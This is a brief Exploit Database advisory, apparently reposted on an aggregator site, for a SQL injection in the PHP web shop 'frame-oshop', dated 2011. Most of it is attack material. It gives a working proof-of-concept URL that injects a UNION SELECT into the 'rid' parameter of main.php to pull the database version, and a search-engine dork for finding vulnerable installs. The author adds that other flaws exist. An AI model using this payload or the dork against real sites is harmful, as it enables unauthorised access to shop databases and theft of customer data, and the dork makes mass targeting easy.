frame-oshop – SQL Injection

• Exploit Database
• 15 阅读

• 作者： -SmoG-
  日期： 2011-05-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17289/

• product:	frame-oshop
  vendor:		http://www.sdaxx.de/
  date:		15.05.2011
  status:		0day
  version:	i dunno...
  
  PoC: http://www.host.com/shop/main.php?id=1111&show=rubrik&rid=-1%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12
  
  Dork: 		"2006 by Sdaxx Rostock" intitle:"frame-oshop"
  
  Note:		-sessid had to be fresh
  		-there are more vuln...
  
  >>published by -SmoG- on SceneGround.info<<
  
  
  gretz to my mentor Therion, c0x and other sg-members!